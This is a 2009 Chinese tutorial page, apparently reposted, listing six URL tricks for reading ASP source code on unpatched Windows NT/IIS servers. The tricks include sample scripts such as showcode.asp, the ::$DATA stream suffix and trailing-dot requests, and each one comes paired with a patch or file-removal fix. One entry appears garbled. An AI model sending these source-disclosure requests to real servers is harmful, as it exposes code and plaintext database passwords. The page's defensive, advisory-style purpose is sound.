当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > 偷看ASP原码的6种方法

安全防护
2003服务器防止海洋木马的安全设置(1)
2003服务器防止海洋木马的安全设置(2)
2003服务器防止海洋木马的安全设置(3)
加固脆弱的IIS服务
linux操作系统的优化及安全配置(1)
linux操作系统的优化及安全配置(2)
linux操作系统的优化及安全配置(3)
Server2003 DNS服务安装篇(2)
Server2003 DNS服务安装篇(3)
Server2003 DNS服务安装篇(4)
WindowsServer2003安全事件ID分析(1)
WindowsServer2003安全事件ID分析(2)
打造安全的Windows 2003系统(5)
Win2003 Server手动设置全攻略(1)
Win2003 Server手动设置全攻略(2)
Win2003 Server手动设置全攻略(3)
Win2003 Server手动设置全攻略(4)
搜索型注入之我看
为Windows 2003安全—层层设防(1)
为Windows 2003安全—层层设防(2)

安全防护 中的 偷看ASP原码的6种方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 43 ::
收藏到网摘: n/a

在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序的源代码,它们是:

1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp

2、$DATA">http://somewhere/something.asp::$DATA
解决方案: 装sp3

3、http://somewhere/something.asp.
解决方案: 装sp4

or http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

4、http://somewhere/something.Asp
或者 http://somewhere/something.%asp
解决方案: 装sp4

5、http://somewhere/something.asp
解决方案:装sp6或者打补丁

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;